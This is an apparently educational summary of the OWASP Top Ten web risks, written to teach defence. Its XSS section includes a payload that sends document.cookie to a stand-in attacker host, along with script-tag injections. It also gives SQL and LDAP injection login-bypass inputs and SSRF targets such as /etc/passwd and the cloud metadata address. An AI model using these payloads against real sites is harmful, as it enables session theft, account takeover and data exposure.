What is OWASP?
- stand for “Open Web Application Security Project”
- a nonprofit foundation that works to improve the security of software
OWASP Top Ten
1. Broken Access Control
- This error is often found on sites where identity and permissions are lacking.
- Take an example, a simple business website but there is no identifier for the admin that just needs to go to the specific path to be able to control the content on the website (“
/my-admin-security-path-no-one-ever-know-abcxyz”). In this case, only the administrator knows the path, but it’s not secure enough because on the Browser it would be a GET method so the URL will be cached in the browser, or may accidentally be taken when we send it through a chat channel, etc. - The second sample is a website with many roles and permission such as admin, marketer, operator, developer, etc. All users are required to log in by SSO (single sign-on) or normal user/password. After login, the user would be redirected to the path that relates to their role (/marketer, /operator, etc.). However, the system does not restrict the user by their granted permission, anyone can access other parts and manage the data not related to their role by typing a direct URL to the browser
- Regarding the object controlled by the owner, the system may be missing an authorization check when it receives a command from any user. This can cause the private object that could be viewed, edited, or deleted by another account
2. Cryptographic Failures
- was previously known as “Sensitive Data Exposure”. Like its name, this issue is about the user’s data has been exposed accidentally. The system may store some information such as email, name, birthday, role_id, etc. on the browser’s cookie or the local storage. It helps the hacker can do the password detection easier.
- Hackers can also get sensitive information such as email, password, access_token, etc. based on unsecured data transmission (no SSL, the information is not encrypted)
3. Injection LDAP & Cross-site scripting XSS & SQL Injection
- Cross-site scripting XSS. The hacker injects the external script (Javascript, HTML, PHP, etc.) into the URL or into the content of the website. Two types commonly occur
a. Reflected XSS. The script is attached to the URL and the victim would be seduced to click on it click on it. If the session of this user is still live on the website, the hacker can get all the information stored in the browser’s cookie and access the user’s account.
b. Stored XSS. The hacker would write a toxic script and save it to his information account. Then, every time others go to his page, their cookie will send to the hacker’s server
- Cross-site scripting XSS with JS
https://abc.com?msg=var+i=new+Image;+i.src="http://hacker-site.net/cookie="%2Bdocument.cookie;- Cross-site scripting XSS with DOM
https://abc.com?msg=<script src="hacker.js"></script>- Stored XSS. Hacker register an account on the website and attach his script into a specific page. The script will be executed when any user visits his page
<script src="hacker.js"></script>
- SQL Inject. This situation can happen when the server inserts a text received from the param directly into the SQL query. a hacker can log in to any account with a query that always returns true
Post /login
Body:
- Name: " or ""="
- Pass: " or ""="The server query would be:
- origin query:
SELECT * FROM Users WHERE Name ="Name" AND Pass ="Pass"
- after qurery:
SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
- Injection LDAP (Lightweight Directory Access Protocol). Is a server-side attack that could allow sensitive information about the user and the server represented in an LDAP structure to be revealed. It is somewhat similar to SQL Injection, but its purpose is to expose necessary information such as user information, the structure of the query. It uses some specific char to inject to the query
Post /login
Body:
- Name: admin)(&)) => (&) this always return true
- Pass: somethings4. Insecure Design
- is a new category for 2021, with a focus on risks related to design flaws. More explanation
5. Security Misconfiguration
- It occurs when the error is reported too much or too default. For example, when a user visits a page that does not exist, he receives an NGINX not found page error or when an error query search is sent to the user attached the name of Database type or the notification error in detail such as the username does not exist, the password must longer than 8 characters and include some special char, enter a wrong password, etc.
6. Vulnerable and Outdated Components
- It is about the control version of the 3rd module or plugin. The outdated component could lead to incompatible with other parts such as nested dependencies, OS, system library. All the libraries should be keep tracking of the updates, test the compatibility of updated, upgraded, or patched libraries
- Before using a third-party library, it must be double-checked release number, amount of supporters, reliability, number of downloads, security tested, and the nested/dependency libraries
7. Identification and Authentication Failures
- Permits automated attacks such as credential stuffing, where the attacker has a list of valid usernames and passwords (brute force or other automated attacks)
- Permits default, weak, or well-known passwords, such as “Password1” or “admin/admin”
- Uses weak or ineffective credential recovery and forgot-password processes, such as “knowledge-based answers” which cannot be made safe
- Uses plain text, encrypted, or weakly hashed passwords data stores (see 2. Cryptographic Failures)
- Has missing or ineffective multi-factor authentication
- Exposes session identifier in the URL
- Reuse session identifier after successful login
- User sessions or authentication tokens (mainly single sign-on (SSO) tokens) aren’t properly invalidated during logout or a period of inactivity
8. Software and Data Integrity Failures
- It relates to code and infrastructure such as using untrusted sources, repositories, and content delivery networks, insecure CI/CD pipeline (unauthorized access, malicious code, or system compromise)
- For example, attackers could see and inject their code into the CI/CD pipeline or modify the insecure parts
9. Security Logging and Monitoring Failures
- In short, this issue relates to missing and insufficient logging such as failed logins, suspicious API calls, only stored locally. It leads to applications cannot detect, escalating, or alert for active attacks in real-time or near real-time
10. Server-Side Request Forgery
- SSRF flaws occur whenever a web application is fetching a remote resource without validating the user-supplied URL
Example Attack Scenarios
Attackers can use SSRF to attack systems protected behind web application firewalls, firewalls, or network ACLs, using scenarios such as:
Scenario #1: Port scan internal servers — If the network architecture is unsegmented, attackers can map out internal networks and determine if ports are open or closed on internal servers from connection results or elapsed time to connect or reject SSRF payload connections.
Scenario #2: Sensitive data exposure — Attackers can access local files such as or internal services to gain sensitive information such as file:///etc/passwd</span> and http://localhost:28017/.
Scenario #3: Access metadata storage of cloud services — Most cloud providers have metadata storage such as http://169.254.169.254/. An attacker can read the metadata to gain sensitive information.
Scenario #4: Compromise internal services — The attacker can abuse internal services to conduct further attacks such as Remote Code Execution (RCE) or Denial of Service (DoS).
